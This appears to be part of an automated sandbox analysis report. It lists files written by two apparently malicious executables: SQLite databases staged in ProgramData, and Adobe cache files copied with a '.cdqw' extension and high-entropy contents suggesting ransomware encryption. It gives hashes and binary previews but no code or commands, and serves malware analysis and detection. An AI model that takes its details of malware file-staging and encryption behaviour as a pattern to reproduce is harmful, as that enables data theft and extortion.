                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                      Entropy (8bit):0.7873599747470391
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\FCBAEHCAEGDHJKFHJKFI

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\HDBKFHIJ

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\HIJJEGDBFIIDGCAKJEBK

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\IEHIIIJD

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):626
                                                                                                                                                                      Entropy (8bit):7.657860547788074
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:k+ffCj2Zm7D0Wo9mgM+PZDO83SK6cSzlLflvjQmjC16ErmMSUdNcii9a:LffCqZvtmg/Zy8ibcuvjzEry2bD
                                                                                                                                                                      MD5:D102D4980CC4720B69CA6EC51BA685E0
                                                                                                                                                                      SHA1:4359F0D0282E1718B5110040B7AA97F6CAA0BD56
                                                                                                                                                                      SHA-256:6777B4B5D03A6ADE6D6118000DDC03E125ECA793C1BDEAEC57A13611BC6895F1
                                                                                                                                                                      SHA-512:FF4D10D5435F3BF88A0A9030E5027C3F07CA9740FB0B837C4E9D213968C4BB7EB25222873D3ACC8B72C14CB86F88122710ADF273BFB52732907ED63537DA1084
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/=.bKy._S5g.. ....q..r=.V&....7...>{.F.~?..|.F@Mh...W$..$A....\...E]l%...x..W.6....df....L..\1F.a3.]pE..@.......|..-....s...YQU.xz...$...?.=h+..Q..h.y..]s..G..2-V...:s...o].I:..V...8....V`..D.N%....&.3d.......,...)o6`.Y.Q.'. z...e@.:.|RY.SUD(t....D...A#.A....J....Q..@Y.^.u:...>.$u[.0mU*..zu...}.4..X/.]z..`Rk.d.G7z..i[O.......G~.............o=.y..UU3>.."|.3w.s...;..C.D ...o.d;.G..aag./..)...._+(\c..1....%.Ofs....cz...P...fee.l;...?...*..kqC5..2.....#.@..-b..{...-M.B..\j....1X.M.e......P..96...m...#...K.!F.`!.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):626
                                                                                                                                                                      Entropy (8bit):7.657860547788074
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:k+ffCj2Zm7D0Wo9mgM+PZDO83SK6cSzlLflvjQmjC16ErmMSUdNcii9a:LffCqZvtmg/Zy8ibcuvjzEry2bD
                                                                                                                                                                      MD5:D102D4980CC4720B69CA6EC51BA685E0
                                                                                                                                                                      SHA1:4359F0D0282E1718B5110040B7AA97F6CAA0BD56
                                                                                                                                                                      SHA-256:6777B4B5D03A6ADE6D6118000DDC03E125ECA793C1BDEAEC57A13611BC6895F1
                                                                                                                                                                      SHA-512:FF4D10D5435F3BF88A0A9030E5027C3F07CA9740FB0B837C4E9D213968C4BB7EB25222873D3ACC8B72C14CB86F88122710ADF273BFB52732907ED63537DA1084
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/=.bKy._S5g.. ....q..r=.V&....7...>{.F.~?..|.F@Mh...W$..$A....\...E]l%...x..W.6....df....L..\1F.a3.]pE..@.......|..-....s...YQU.xz...$...?.=h+..Q..h.y..]s..G..2-V...:s...o].I:..V...8....V`..D.N%....&.3d.......,...)o6`.Y.Q.'. z...e@.:.|RY.SUD(t....D...A#.A....J....Q..@Y.^.u:...>.$u[.0mU*..zu...}.4..X/.]z..`Rk.d.G7z..i[O.......G~.............o=.y..UU3>.."|.3w.s...;..C.D ...o.d;.G..aag./..)...._+(\c..1....%.Ofs....cz...P...fee.l;...?...*..kqC5..2.....#.@..-b..{...-M.B..\j....1X.M.e......P..96...m...#...K.!F.`!.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):670
                                                                                                                                                                      Entropy (8bit):7.680469429326761
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kURVxWdmpR+cdoVJvbWrM6xXWG1KpUDudaVmMu6yng8aKZCQRSUdNcii9a:DRVYdmycdoVJDWo6x5KpUDtVTuJgrQ0w
                                                                                                                                                                      MD5:077558A3218EACB7A8C46DCD08E4B9B0
                                                                                                                                                                      SHA1:28C5F937C630E6F297E9BFCCA12A373DA17DF0B0
                                                                                                                                                                      SHA-256:B61B3CD726D286784E495A97D30CAD08AB20CAA088356CA625534F08B560484A
                                                                                                                                                                      SHA-512:26789E93C9D9DA089D41410F34779A78E53780A82A11477EA3CACDDA37B3819DC2C8E200B769D1830093C66E697CCD7737E234B56708164F3731D3A05BCF0E9C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/.<fd.X..?.s..AY..c..b..-.>2....j>...LY..{...........\.}...'...@..B..*.%......N.=.eK..r."x.or....I..+.....x.^.?Zw.E...>.,h(..Wy..[...>.dV....:c..Y......T..i..W#.t.....j..Cq.TG.l.........o..h..o....+. ..h..A._....}IX...-V..E..../.C..}{.Y.....3.{.y..|.E1..T5U..&.P.3..pY=..\A..R`.R..HA.'..E.-..4.....Gi....._.>.......5A.l.^.-B.!-.mN...q....~.j@hY..{...0.M..SwZ.3.A...&eS5(...](h.o....Gl..[...,...WP......E..|..{..8...L.........^j55..H.^w..A..~.Q...Y....b!.U.d.....0$9..0..#........./....A(..-..(1....h.T0..O...'..+.....,.M..e..w..O.FL..E.....r.e...f.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):670
                                                                                                                                                                      Entropy (8bit):7.680469429326761
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kURVxWdmpR+cdoVJvbWrM6xXWG1KpUDudaVmMu6yng8aKZCQRSUdNcii9a:DRVYdmycdoVJDWo6x5KpUDtVTuJgrQ0w
                                                                                                                                                                      MD5:077558A3218EACB7A8C46DCD08E4B9B0
                                                                                                                                                                      SHA1:28C5F937C630E6F297E9BFCCA12A373DA17DF0B0
                                                                                                                                                                      SHA-256:B61B3CD726D286784E495A97D30CAD08AB20CAA088356CA625534F08B560484A
                                                                                                                                                                      SHA-512:26789E93C9D9DA089D41410F34779A78E53780A82A11477EA3CACDDA37B3819DC2C8E200B769D1830093C66E697CCD7737E234B56708164F3731D3A05BCF0E9C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/.<fd.X..?.s..AY..c..b..-.>2....j>...LY..{...........\.}...'...@..B..*.%......N.=.eK..r."x.or....I..+.....x.^.?Zw.E...>.,h(..Wy..[...>.dV....:c..Y......T..i..W#.t.....j..Cq.TG.l.........o..h..o....+. ..h..A._....}IX...-V..E..../.C..}{.Y.....3.{.y..|.E1..T5U..&.P.3..pY=..\A..R`.R..HA.'..E.-..4.....Gi....._.>.......5A.l.^.-B.!-.mN...q....~.j@hY..{...0.M..SwZ.3.A...&eS5(...](h.o....Gl..[...,...WP......E..|..{..8...L.........^j55..H.^w..A..~.Q...Y....b!.U.d.....0$9..0..#........./....A(..-..(1....h.T0..O...'..+.....,.M..e..w..O.FL..E.....r.e...f.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):818
                                                                                                                                                                      Entropy (8bit):7.725840622147882
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YKW/dpXsutS4toLc7ZjDjH+AS/qF6MeixwD2bD:YdXshLc7ZjneA2iDD
                                                                                                                                                                      MD5:F95C66FE703EEF25A1786280A658AB49
                                                                                                                                                                      SHA1:12120128C5E78D13ED7662A3608782FE3E8EA438
                                                                                                                                                                      SHA-256:D9D13EE8D70FFC29263C3F815E05CB6B8E41C44D2540CCC17BCD7E2856155C3E
                                                                                                                                                                      SHA-512:9E1913A7EBAD9E3AD14112DF5F6280F25540B526060A6E841D5A4FE6C6141B4D6F96E9B5C559A88725CE35B43FFDB4A6987E30E1BA2A91AD470B7AA8937F5FDD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"os_...N...;...?w.0.|.).H~..ySrF9......yvI..as....].r.O...b\E6....).=....[.+.`GO.+.Q..@.t.|"<N.Kp.F.......8;./c.!!ug..]....q..u.2Z....b0.E).k.....r...Dg.n.8`...0~...R.O.qbh...J..M.0%....+&..]..>*../..=-...S..?.t.=%..."..W\.H...8!...'..U...I.wZ...`...6T...u..U&.....]_j...*.....P.y.a9...H6.4Tg0$~q..[.'....v.&>...h../'.....#.W...."...F..V..X......H.......v.@?W-*.S....k.I.}]....sA.IXF.T.i..%&4@.1..{...+.F+.-=.i...[W.5.Xub.....vg^..zm....@.....iFH.n.+F...........Y......?..5(.......<.v..c.a.t;>.w.........7..x...G.M.).//'.&6..Cv*.P...G.....[.+<.aW.....l..`...<h.y..,n.2...0a,Xv..qU.,.}z.....F...iQ.....3?w..1)o.....)...F.[:...P..N.N......z....W..=.8....E....0(.n.`.(.h.0.R.Ex..V...f?...j.=..{.&.@..n.+...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):818
                                                                                                                                                                      Entropy (8bit):7.725840622147882
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YKW/dpXsutS4toLc7ZjDjH+AS/qF6MeixwD2bD:YdXshLc7ZjneA2iDD
                                                                                                                                                                      MD5:F95C66FE703EEF25A1786280A658AB49
                                                                                                                                                                      SHA1:12120128C5E78D13ED7662A3608782FE3E8EA438
                                                                                                                                                                      SHA-256:D9D13EE8D70FFC29263C3F815E05CB6B8E41C44D2540CCC17BCD7E2856155C3E
                                                                                                                                                                      SHA-512:9E1913A7EBAD9E3AD14112DF5F6280F25540B526060A6E841D5A4FE6C6141B4D6F96E9B5C559A88725CE35B43FFDB4A6987E30E1BA2A91AD470B7AA8937F5FDD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"os_...N...;...?w.0.|.).H~..ySrF9......yvI..as....].r.O...b\E6....).=....[.+.`GO.+.Q..@.t.|"<N.Kp.F.......8;./c.!!ug..]....q..u.2Z....b0.E).k.....r...Dg.n.8`...0~...R.O.qbh...J..M.0%....+&..]..>*../..=-...S..?.t.=%..."..W\.H...8!...'..U...I.wZ...`...6T...u..U&.....]_j...*.....P.y.a9...H6.4Tg0$~q..[.'....v.&>...h../'.....#.W...."...F..V..X......H.......v.@?W-*.S....k.I.}]....sA.IXF.T.i..%&4@.1..{...+.F+.-=.i...[W.5.Xub.....vg^..zm....@.....iFH.n.+F...........Y......?..5(.......<.v..c.a.t;>.w.........7..x...G.M.).//'.&6..Cv*.P...G.....[.+<.aW.....l..`...<h.y..,n.2...0a,Xv..qU.,.}z.....F...iQ.....3?w..1)o.....)...F.[:...P..N.N......z....W..=.8....E....0(.n.`.(.h.0.R.Ex..V...f?...j.=..{.&.@..n.+...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4168
                                                                                                                                                                      Entropy (8bit):7.957387313717878
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:t6wiOj+HRMoewZG9BzqNUP/ENbEWv64RJwS1A4SsMX4:t6/zHGP9BzqNUPMZECnRmKPMo
                                                                                                                                                                      MD5:77B9B8BF8F42C7039CE2EECA25BA9ACB
                                                                                                                                                                      SHA1:120708BD046E59198F62420B7B14BB308FE6D89F
                                                                                                                                                                      SHA-256:F57F6B7096260731CC03E52EF7AD595A291125F4A56CDF780C4D2E437EDD1F1C
                                                                                                                                                                      SHA-512:B48F6C56F2B1600338795E6675AC923550EF56AC38C9BA417FA33DA8E1AAD2AA9D95452DB1A650866928D830744C1F2D6A13C8AB6FB99FA28A5AD03545A9289E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:*...#....9.v..........I....F.%U$l`......C..+.c.I.MTd.....>).....[.^..O.._..rP7...5c-.0=......J.."@tM8.&..|..]e.4..f.]1V.....I..?.....G..'DO.X.....x5......,...s...,0r.S.j. ...">x.P.+..&.{eM>..*.c..e^...3i...$|^.G...e...N.&V.o*~.^...B..~.~........m.g...}.Q..B^ct.p.c........]c..'.dLh.K&+..62...Lt...<......7$..-..d.....kOH.(....w.5YC.y.+....g..^....{%r+..il|I.3.2.I..<vSu`...*xq..n.E.C!..Au........O.h...g..m.%...+}A.N{.......R..?.BE.u.Vg....=..|..(.1.Q...n..%...s.u..[.-.WXF..z......_.U.e.....(Qaz..e......2.r...$.v`.h.D|.)...GM...%%.L...P......R.....~...[s.^..#...3_.s .%.4.`=..@~..M.wN..1.KDCd..3.K..&b......&....._.W...okg.....xg...$..Z.g6...3. P=....t.?......y.i....(4..pT.b. #s....F*Y.Gbe...n....|.......{..I.7.....z.e.2....n..M@&..]B..69.Q.n..?.v....b#.h.v`.M....b.J...]...9Rk..."e}|@.(o.G....#...(..\..`8.2O<d.No..T6.|...)05....J....,<....0......d.W_'..)...........;uQ.....gVZ......Vk.^Q.h...r...#f......!.............e!I9.....G=...>.).>..E..;

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4168
                                                                                                                                                                      Entropy (8bit):7.957387313717878
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:t6wiOj+HRMoewZG9BzqNUP/ENbEWv64RJwS1A4SsMX4:t6/zHGP9BzqNUPMZECnRmKPMo
                                                                                                                                                                      MD5:77B9B8BF8F42C7039CE2EECA25BA9ACB
                                                                                                                                                                      SHA1:120708BD046E59198F62420B7B14BB308FE6D89F
                                                                                                                                                                      SHA-256:F57F6B7096260731CC03E52EF7AD595A291125F4A56CDF780C4D2E437EDD1F1C
                                                                                                                                                                      SHA-512:B48F6C56F2B1600338795E6675AC923550EF56AC38C9BA417FA33DA8E1AAD2AA9D95452DB1A650866928D830744C1F2D6A13C8AB6FB99FA28A5AD03545A9289E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:*...#....9.v..........I....F.%U$l`......C..+.c.I.MTd.....>).....[.^..O.._..rP7...5c-.0=......J.."@tM8.&..|..]e.4..f.]1V.....I..?.....G..'DO.X.....x5......,...s...,0r.S.j. ...">x.P.+..&.{eM>..*.c..e^...3i...$|^.G...e...N.&V.o*~.^...B..~.~........m.g...}.Q..B^ct.p.c........]c..'.dLh.K&+..62...Lt...<......7$..-..d.....kOH.(....w.5YC.y.+....g..^....{%r+..il|I.3.2.I..<vSu`...*xq..n.E.C!..Au........O.h...g..m.%...+}A.N{.......R..?.BE.u.Vg....=..|..(.1.Q...n..%...s.u..[.-.WXF..z......_.U.e.....(Qaz..e......2.r...$.v`.h.D|.)...GM...%%.L...P......R.....~...[s.^..#...3_.s .%.4.`=..@~..M.wN..1.KDCd..3.K..&b......&....._.W...okg.....xg...$..Z.g6...3. P=....t.?......y.i....(4..pT.b. #s....F*Y.Gbe...n....|.......{..I.7.....z.e.2....n..M@&..]B..69.Q.n..?.v....b#.h.v`.M....b.J...]...9Rk..."e}|@.(o.G....#...(..\..`8.2O<d.No..T6.|...)05....J....,<....0......d.W_'..)...........;uQ.....gVZ......Vk.^Q.h...r...#f......!.............e!I9.....G=...>.).>..E..;

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):658
                                                                                                                                                                      Entropy (8bit):7.671234772101226
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kwij/3hb2PbVfjtOXGRvPAAyHTwzYt/zF4Cy/ozSUdNcii9a:piNb2PZP5mHOSLF4Zw+2bD
                                                                                                                                                                      MD5:9FB8BE9BC72B4EDFF48F120FE9F88AE8
                                                                                                                                                                      SHA1:FE151206BA1A5F0DE9134DDAAEEC50685B8A092F
                                                                                                                                                                      SHA-256:C92A56309C74E82D14ECCD6F7E3AAC6F0E4A1E683DC84AF808A0BA47C98057AB
                                                                                                                                                                      SHA-512:75CC6F25383F0E014504334AFD6C5A37DC492B06109862EC6787EF8FE3B4DFC03276BB2BA54200B72D4B5FBF6D7A463C857B3DAFC34D2D65DD0A8D53F6BC5A90
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/.6.%/.x...L.....Bd..Pdu...,....!...8..a.t.2M.... e*=........h..>.$.k...1...X..d5k..a.u.j3y.\.j.....4...3...{..o.Hk....f.`re24...|".X.........)...6.^v.................0.....TBE..ir.....FM9V.~..(0q.<I.D...S.@...B.a.}..T..0....p...i....\e.{......0..8....x...F.D...u....]V.C. .M........G...H.HJ.Q......c..V'.QC.}....1.....8D......)M1W...P.;'..o..?...P.r#........4p......&.}.]....|F=.s..(....vu.....|..'].5.-..@"U..!................`.ee...?`......#~...../.I...!.O..y......+..*.. p...t.2S.py_......3.!..^.'.........Q....o..}.>...B[...M<."........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):658
                                                                                                                                                                      Entropy (8bit):7.671234772101226
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kwij/3hb2PbVfjtOXGRvPAAyHTwzYt/zF4Cy/ozSUdNcii9a:piNb2PZP5mHOSLF4Zw+2bD
                                                                                                                                                                      MD5:9FB8BE9BC72B4EDFF48F120FE9F88AE8
                                                                                                                                                                      SHA1:FE151206BA1A5F0DE9134DDAAEEC50685B8A092F
                                                                                                                                                                      SHA-256:C92A56309C74E82D14ECCD6F7E3AAC6F0E4A1E683DC84AF808A0BA47C98057AB
                                                                                                                                                                      SHA-512:75CC6F25383F0E014504334AFD6C5A37DC492B06109862EC6787EF8FE3B4DFC03276BB2BA54200B72D4B5FBF6D7A463C857B3DAFC34D2D65DD0A8D53F6BC5A90
                                                                                                                                                                      Malicious:false
